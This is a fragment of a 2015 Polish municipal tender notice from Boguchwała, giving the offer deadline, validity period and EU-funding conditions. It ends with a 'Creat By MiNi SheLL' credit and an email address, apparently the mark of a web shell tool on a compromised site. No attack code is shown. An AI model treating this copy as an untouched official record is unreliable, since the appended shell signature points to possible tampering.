<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Boguchwale
ul. Doktora Tkaczowa 134
36-040 Boguchwała.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2015 godzina 09:30, miejsce: Urząd Miejski w Boguchwale
ul. Doktora Tkaczowa 134
36-040 Boguchwała 
Biuro Obsługi Klienta - Parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com